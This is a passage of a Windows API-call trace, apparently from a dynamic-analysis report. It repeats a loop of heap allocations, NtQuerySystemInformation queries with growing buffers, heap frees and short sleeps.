[0249.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0249.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.755] Sleep (dwMilliseconds=0x110) [0249.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0249.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0249.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0249.773] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0249.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0249.773] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.774] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0249.777] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0249.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0249.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.780] Sleep (dwMilliseconds=0x110) [0249.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0249.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0249.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0249.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0249.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0249.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0249.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0249.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0249.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.802] Sleep (dwMilliseconds=0x110) [0249.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0249.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0249.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0249.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0249.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0249.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0249.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0249.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0249.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.820] Sleep (dwMilliseconds=0x110) [0249.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0249.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0249.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0249.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0249.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0249.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0249.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0249.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0249.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.829] Sleep (dwMilliseconds=0x110) [0249.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0249.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0249.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0249.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0249.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0249.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0249.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0249.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0249.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.849] Sleep (dwMilliseconds=0x110) [0249.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0249.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0249.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0249.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0249.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0249.864] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0249.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0249.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0249.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.866] Sleep (dwMilliseconds=0x110) [0249.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0249.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0249.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0249.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0249.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0249.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0249.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0249.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0249.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.877] Sleep (dwMilliseconds=0x110) [0249.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0249.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0249.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0249.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0249.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0249.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0249.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0249.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0249.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.895] Sleep (dwMilliseconds=0x110) [0249.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0249.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0249.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0249.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0249.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0249.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0249.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0249.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.911] Sleep (dwMilliseconds=0x110) [0249.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0249.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0249.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0249.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0249.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0249.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0249.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0249.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0249.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.921] Sleep (dwMilliseconds=0x110) [0249.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0249.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0249.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0249.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0249.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0249.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0249.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0249.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0249.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.944] Sleep (dwMilliseconds=0x110) [0249.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0249.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0249.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0249.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0249.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0249.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0249.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0249.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0249.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.953] Sleep (dwMilliseconds=0x110) [0249.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0249.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0249.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0249.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0249.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0249.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0249.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0249.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0249.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.974] Sleep (dwMilliseconds=0x110) [0249.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0249.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0249.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0249.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0249.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0249.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0249.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0249.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 